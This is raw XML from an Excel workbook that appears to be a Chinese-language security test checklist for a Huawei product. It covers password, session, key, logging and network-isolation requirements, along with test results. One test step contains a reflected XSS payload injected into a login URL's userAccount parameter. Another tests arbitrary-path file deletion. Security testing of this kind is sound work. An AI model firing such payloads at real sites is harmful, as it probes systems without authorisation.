    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>无此类url</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.网络拓扑图符合安全性要求</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.组网图按照安全域过行划分</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>数据库放置于核心业务区或其他内部网络区域，且必须与DMZ区隔离。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>不同的安全域之间配置状态防火墙来实现相互间的访问控制</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>检查产品配套的组网设计文档，数据库放是否部署在核心业务区或其他内部网络区域，是否与DMZ区隔离。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>不涉及数据库</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>产品的描述文档（如：产品的概述文档），对产品安全特性进行描述。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>产品提供单独的《产品安全技术白皮书》文档及《产品安全解决方案》胶片，该文档可用于市场宣传、交流。
主要内容：
1、华为产品的安全架构
2、为保证设备自身安全而采取的安全措施、具备的安全特性
3、安全组网建议
4、产品已经遵循/满足的安全标准/法律法规</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>主要内容：
1、安全加固及检查，主要包括操作系统、数据库或WEB服务器等加固内容，需要包含具体的加固内容和操作步骤
2、应用的安全配置，针对产品业务安全应用，需要启用哪些安全选项，配置哪些内容。（对于需要通过对产品开局时进行安全策略配置才能生效的安全功能，需要提供此部分内容）如果没有应用的安全调测，命名为安全加固指南</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>不能设置长度低于8个字符的新口令，并给出提示。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>不能设置长度低于6个字符的新口令，并给出提示。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>场景一：
系统在用户登录成功后才提供口令修改功能。
场景二：
登录前的修改口令功能：服务器端认证旧口令通过后才能进行修改口令；登录前的修改口令功能有验证码或次数限制防止暴力破解；口令传输采用加密传输方式。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.界面（管理界面、终端界面、用户界面、命令行）、文件、数据库、web源文件和C/S抓取工具、日志、内存（BS、CS客户端）、cookie、调试跟踪信息中不存在口令明文。
2.人机接口设置口令时，输入口令不能明文回显
注：BS架构中非我司自有浏览器（客户端）的内存中含口令明文不可控。
命令行输入口令可以是明文，建议关闭上下键显示历史命令（防止回显历史登录口令）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>尽管用户A和用户B的口令相同，但在数据库中，用户A和用户B的口令字段的值不同。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在不需要还原口令的场景，必须使用不可逆算法加密。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、检查应用系统中所有可能存储口令的文件的访问控制权限
2、以普通用户（非属主）身份登录口令文件所在操作系统，尝试读取口令文件原文或者拷贝口令文件
3、私钥（private.key),证书文件（*.cer）其他用户不可读。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>无法捕获明文口令</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>产品配套资料提供清晰的帐号口令清单。
产品CPI资料中需描述系统的默认账号和口令,提醒用户修改默认帐号/口令及定期更新，并提示风险。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>WebScarab拦截的修改口令的请求中不包含操作员帐号和可能被猜解的身份标识。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>WebScarab拦截的修改口令的请求中不包含最终用户帐号和可能被猜解的身份标识。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>口令设置不成功，并给出提示。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、系统默认开始ssl/tls协议；
2、抓包内容采用ssl/tls保护数据</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.第3步在认证过程中必须存在；
2.第4步只有在认证双发模式下存在，在认证服务器模式下为非必选项</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.没有删除超级用户的功能，如果有请继续2
2.可以添加删除的超级用户</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.url访问失败
2.没有弹出xss的对话框S</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.调用删除文件接口，文件路径指定为其它任意文件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.http://hwid1.vmall.com:8080/oauth2/portal/login.jsp?validated=true&amp;service=http://www.vmall.com/account/caslogin?url=/member?t=14334982118461433498212437&amp;loginChannel=26000000&amp;reqClientType=26&amp;userAccount=13000000000&lt;script&gt;alert(/xss/)&lt;/script&gt;&amp;viewType=，对userAccount后添加&lt;script&gt;alert(/xss/)&lt;/script&gt;
2.在浏览器里记问这个url，</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、/etc/passwd文件里除了root用户之外，禁止存在UID为0的其他账户</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>对于仅支持本地接入的某些输入受限设备（如银行ATM机）不强制要求口令复杂度检查，其他情况必须满足如下要求： 
1、缺省口令必须满足复杂度要求
2、IPSec、SSL、SNMP预共享密钥缺省值必须进行复杂度检查(在使用预共享密钥的场景下，如果预共享密钥由口令导出且需要与第三方对接，则不强制要求口令的复杂度）
3、SNMP v1、v2 读/写团体字必须满足口令复杂度要求
4、新建和修改口令时必须检测口令复杂度
5、口令复杂度必须在服务器端检测
6、用户输入口令必须满足口令复杂度要求
7、须缺省打开口令复杂度检查功能
8、禁止使用C标准库函数random()、rand()生成随机数用于安全用途
9、禁止使用Java的java.util.Random类生成随机数用于安全用途
10、系统自动生成的口令长度至少为6个字节
11、用户自行输入的密码需提示用户密码强度</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>认证是否存在错误次数锁定策略？
服务器跳板机有锁定机制，hive由FI机制保障</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、在登录界面或者修改口令界面中，禁止在界面上明文回显输入的口令
2、使用交互式命令行参数时，禁止在界面上明文回显输入的口令
3、是否在程序的错误提示信息中明文显示口令
4、是否在调试信息中明文显示口令
5、是否使用查看历史命令（如：方向健或history）的方式显示口令</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、必须对系统管理的人机接口提供认证机制（如：管理员执行管理操作前应进行身份认证）
2、必须对系统管理的跨信任域的机机接口提供认证机制
3、对于设备外部的物理接口，如果接入该物理接口后可以对设备进行管理，那么须对该物理接口提供接入认证机制
4、禁止采用自行设计的认证方法，如：
   1)仅使用IP或者MAC地址作为认证依据
   2)认证过程中把口令的简单hash值（口令的MD5值、SHA1或SHA256的值）通过网络传输并作为认证凭据
5、在使用SSL协议进行身份认证时，客户端验证服务端的身份（服务端的公钥证书）时遵循以下步骤：
   A)服务端证书应由可信CA签发；
   B)服务端证书应在有效期；
   C)应通过OCSP或CRL验证服务端证书的吊销状态，证书中不提供OCSP服务和CRL分发点的除外。
   D)服务端证书的CN项与服务器的域名或IP地址应匹配；
  如果上述验证步骤有一项没有验证通过，客户端应提示警告信息并由客户选择是否继续建立SSL连接</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、服务端禁止使用客户端的验证结果来验证用户身份的合法性
2、对上传/下载/删除/创建目录等操作权限控制须在服务端进行控制，防止用户可以绕过限制。
3、对于赋权权限的判断禁止仅在前台做了灰化，而没有在后台做校验。防止任意用户可在登陆后通过直接构造并发送赋权报文，绕过前台的限制给自己赋权</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、对于管理面人机登录的场景，禁止提供“自动登录”、“记住我”、“记住密码”等功能；在有客户明确需求的情况下，终端消费类产品不强制要求</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、系统认证时，必须提供防暴力破解机制
2、当产品使用验证码时，必须先对验证码进行验证，再验证帐号/口令的正确性
3、当重复输入错误口令次数(如3次）超过阈值时，返回的错误信息不应泄露系统敏感信息，如对于不存在的帐号也应该提示被锁定，防止与已存在的帐号提示信息不一致。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、用户登录失败后，登录界面禁止提示"用户名不存在"、"口令必须是6位"、"用户名无效"之类的有助于攻击者用于猜解系统用户名/口令的信息
2、如果认证失败的返回报文中携带了错误码，错误码应同时代表“用户名或密码错误”的含义；通过分析错误码应无法分析出可能的错误原因是“用户名不存在”、“口令必须是6位”、“用户名无效”之类的具体错误
3、（可选）无论帐号名是否存在，在达到锁定阈值后，都应该启动锁定机制</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、登录、登出操作和结果必须记录日志
2、账户锁定和解锁（含自动）操作和结果必须记录日志
3、对于特殊的用户（如：超级管理员、默认账户等），登录、登出、锁定、解锁操作及结果也必须记录日志，不能有例外情况</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、低权限用户创建一个新用户，通过新建的用户不能为自身增加权限
2、新建的管理员不能增加自身没有的权限</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、成功认证后必须更换会话标识
2、特殊情况下需要二次认证，二次认证后必须更换会话标识</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、B/S应使用HTTPS传输
2、C/S应使用TLS等加密传输</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、B/S 应用中，只允许使用cookie方式维持会话，其他方式均不可以使用</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、token必须使用安全随机数生成
2、token长度必须超过24个字符（或192bits）
3、token最长有效期必须小于或等于会话有效期
4、B/S架构中，token必须存在于HTTP header或页面隐藏域中</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、会话中的重要信息（如用户名、用户ID、用户权限等）必须存储在服务器端
2、对于sessionid等必须在客户端存储的信息，服务器端须同样存储一份用于校验</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.服务端必须对客户端的请求进行合法性校验（如校验会话标识是否存在、会话标识是否与用户IP匹配等）。对于不存在会话id的操作视为非法会话
2.如果会话id存在，至少做以下校验
  非移动设备Session id应与客户端IP绑定
  C/S移动设备Session id应与IMEI号绑定
  B/S移动设备Session id应只与token绑定</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、禁止将会话标识符以GET参数进行传递
2、禁止在日志或打印信息中暴露会话标识，如需打印，可经过加密后再打印。
3、禁止在url中包含会话标识</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、界面必须提供退出按钮
2、退出后必须通知服务端清除会话</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、设置会话超时时间,禁止将会话超时时间设为永不超时
2、无特殊要求禁止使用自动发起请求的机制阻止session超时</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、传输、存储加密用途的工作密钥不允许硬编码在代码里，硬编码在代码里的密钥无法更新（版本更新不视为密钥更新的方法）
2、系统设计和功能里必须设计和支持密钥更新方法（密钥更新方式：手动更新、自动更新等），并规定密钥更新规则（在线更新、离线更新、更新时间等）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、密钥不允许明文保存在本地
2、密钥材料及密钥组件在本地保存时须严格控制其权限（如权限600或400）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>由于行业标准遵从、与第三方系统对接、向下兼容性等原因，产品可支持不安全密码算法和遗留使用的密码算法，而产品新版本中必须缺省使用推荐的强密码算法。
1、禁止使用MD5、SHA-1作为数字签名的Hash算法
2、禁止使用MD5、DES、blowfish、RC4算法加密数据
3、RSA算法密钥长度不能小于2048</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、对于管理面人机登录的场景，禁止提供“自动登录”、“记住我”、“记住密码”等功能；在有客户明确需求的情况下，终端消费类产品不强制要求</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、禁止存在端口重用、IP地址重用问题
2、网络服务须明确绑定固定的IP地址
3、产品须区分清楚管理面和业务面
4、配置路由保护阻止从维护端口进入内网端口
5、管理面与业务面须进行IP隔离
6、禁止通过配置静态路由从业务接口ping通管理接口
7、管理口与业务口之间的IP报文不允许相互转发，且实现业务面与管理面隔离的命令须默认开启
8、不允许通过在业务端口配置IP进行TELNET、FTP、SSH、SNMP登录，配置、维护、监控系统
9、不允许通过业务接口发送非管理面报文到管理接口
10、加载平面时，禁止通过业务IP、管理IP访问加载平面
11、VPN和LAN的内外网须进行逻辑隔离</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、默认配置禁止使用公网IP
2、公网IP禁止被硬编码
3、禁止预置固定IP及国内网址</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、日志须进行分类管理，操作日志（业务日志）和管理日志
2、操作日志（业务日志）文件达到指定阈值后应进行告警，告警信息写入管理日志
3、日志的覆盖或删除操作应记录管理日志
4、（可选）如果日志写满后，重要日志（如：管理日志）需要删除或覆盖时，应有旧日志的备份机制</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.安全相关的重要的业务操作记录日志</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>手工修改的产品软件包、补丁包、升级包无法使用，会安装失败。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.系统提示帐号已过有效期、被锁定，用户不能登录。
2.系统提示用户不在有效期（或提示该用户未到有效期开始时间），用户不能登录。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、程序运行帐号（OS帐号）不能拥有远程登录的权限。
2、FTP、SCP、DB等应用的专用帐号，不能拥有远程登录操作系统的权限。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、根据产品文档，正常安装系统及应用，并开启服务。
2、使用系统支持的远程访问协议（如：telnet、ssh等）远程登陆系统。
3、尝试使用系统各应用程序的运行账号远程登陆系统。
4、尝试使用FTP、SCP、DB等专用账号远程登陆系统。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.确定目标执行文件的所有调用文件及文件权限。
2.对于目标执行文件及被调用的文件权限相同时，可不进行输入检查。
3.当被调用文件权限比目标执行文件权限低时，调用时，需要进行文件内容检查，文件内不能有越权操作。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.系统有防御CSRF的措施，渗透操作失败。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.目标应用程序具备测试步骤中提到的防御CSRF措施的一个或多个。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.不存在敏感信息泄露</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>不存在可以通过Web方式访问的HappyAxis.jsp文件。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>均不能返回正确的结果</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>数据库文件不能通过web方式直接下载</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.两目标通信组件之间使用强认证。
2.使用安全的加密方式加密通信内容。
3.被测组件间运行的通信协议无法实现中间人攻击。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统对输入参数有检查，无法通过参数注入达到越权。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>只能访问权限范围之内的敏感信息</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>红线 高</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>删除日志，以root用户执行下datapush生成属于root用户localhost.log再切换至hadoopnjpush用户执行报错（无localhost.log权限）？没有以各用户生成log？</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.TCC模拟执行的exechive.sh文件权限
2.DataPush脚本权限</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、日志文件删除后可以自动生成，且可以继续记录后续日志。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>066 日志文件删除后的自动生成</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PUB_SER_SEC_030204_066</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>服务器ssh待确认</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>1.检查系统是否存在非正常业务流程之外的出于于测试、维护、定位目的的采集并存储个人数据、导出个人数据的场景
场景包含不限于：日志、消息跟踪、导出工具、维护工具、维护界面、过程文件等
2.检查这些个人数据采集和处理模块是否有安全保护机制：
   （1）调用这些功能是否需要先通过认证：web管理和接口通过认证，脚本工具通过权限控制，其他场景根据实际情况分析
   （2）是否有日志记录这些功能的调用处理过程；
   （3）</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>web管理和接口：不具备调用权限的普通用户是否能非法调用这些功能；脚本工具至少-非同组用户不可读写和执行</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
3.检查个人数据存储是否有安全保护机制：
   （1）物理/内存数据库：用户认证授权
   （2）文件：权限控制根据业务需求，如果同组用户必须读取也可以容许，至少保证其他用户无法读取；
   （3）其他形式：根据产品实际情况分析保护机制
4.检查个人数据需要导出客户网络时有匿名化机制
4.1如果这些数据涉及华为人员，请参考用例“华为人员参与对现网设备中个人数据进一步整理与分析的场景”
5、检查这些功能在产品资料中是否向运营商公开</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>认证（包括ssh、hive等）的密码是否符合复杂度要求</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文件数据在组件间传输均有加密手段，在FI内部传输、存储由FI安全保障</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>pass</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>045 检查打开服务端口的进程权限是否为管理员权限</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>failed</t>
  </si>
  <si>
    <t>当前根密钥组件中密钥因子只有１个，建议生成多个，并分不同的文件保存</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>密钥文件不能写死在代码中，需要做到用户可配置</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Fortify告警中，发现有2个方法未使用</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>遗留问题，后续版本解决</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</si>
</sst>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2"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="18"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FFFF0000"/>
      <name val="宋体"/>
      <family val="3"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
  </fonts>
  <fills count="8">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9"/>
        <bgColor indexed="64"/>
      </patternFill>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2" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
  </cellStyleXfs>
  <cellXfs count="38">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="2" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="2" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="2" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="14" fontId="6" fillId="0" borderId="1" xfId="2" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="2" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="2" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="2" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="2" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="2" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="1" xfId="0" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="1" xfId="0" quotePrefix="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="1" xfId="0" quotePrefix="1" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="3" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="3" borderId="1" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="4" borderId="1" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="1" xfId="0" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="1" xfId="0" quotePrefix="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="5" borderId="1" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="1" xfId="0" quotePrefix="1" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="6" borderId="1" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="1" xfId="0" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="7" borderId="1" xfId="0" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="7" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="7" borderId="1" xfId="0" quotePrefix="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="7" borderId="1" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="7" borderId="1" xfId="0" quotePrefix="1" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" quotePrefix="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" quotePrefix="1" applyFill="1" applyBorder="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="2" borderId="1" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
  </cellXfs>
  <cellStyles count="3">
    <cellStyle name="常规" xfId="0" builtinId="0"/>
    <cellStyle name="常规 2" xfId="1"/>
    <cellStyle name="常规 7"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xdr:col>
      <xdr:colOff>9525</xdr:colOff>
      <xdr:row>14</xdr:row>
      <xdr:rowOff>95250</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="2" name="Picture 51"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3" name="Picture 54"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4" name="Picture 57"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5" name="Picture 79"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6" name="Picture 82"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7" name="Picture 85"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8" name="Picture 88"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9" name="Picture 91"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0" name="Picture 94"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1" name="Picture 97"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2" name="Picture 102"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3" name="Picture 105"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4" name="Picture 112"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5" name="Picture 115"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6" name="Picture 120"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5</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>13</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>5</xdr:col>
      <xdr:colOff>9525</xdr:colOff>
      <xdr:row>14</xdr:row>
      <xdr:rowOff>95250</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="17" name="Picture 123"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315075"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18" name="Picture 79"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19" name="Picture 79"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0" name="Picture 79"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1" name="Picture 82"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2" name="Picture 85"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3" name="Picture 88"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4" name="Picture 91"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5" name="Picture 94"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6" name="Picture 97"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7" name="Picture 102"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8" name="Picture 105"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29" name="Picture 112"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30" name="Picture 115"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31" name="Picture 120"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twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>13</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>9525</xdr:colOff>
      <xdr:row>14</xdr:row>
      <xdr:rowOff>95250</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
